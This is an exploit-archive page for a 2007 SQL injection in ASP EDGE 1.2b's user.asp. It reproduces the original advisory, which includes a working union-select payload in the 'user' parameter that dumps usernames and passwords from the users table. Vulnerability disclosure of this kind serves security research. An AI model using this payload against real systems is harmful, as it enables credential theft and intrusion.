ASP EDGE - exploit.company

vendor:

ASP EDGE

by:

ajann

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ASP EDGE

Affected Version From: ASP EDGE version <= 1.2b

Affected Version To: ASP EDGE version <= 1.2b

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform remote SQL injection by manipulating the 'user' parameter in the 'user.asp' file of ASP EDGE version 1.2b. An example of the exploit is provided in the text.

Mitigation:

To mitigate the vulnerability, it is recommended to apply a patch or update to a version that is not affected.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//user.asp?user=[SQL]

Example:

//user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-24]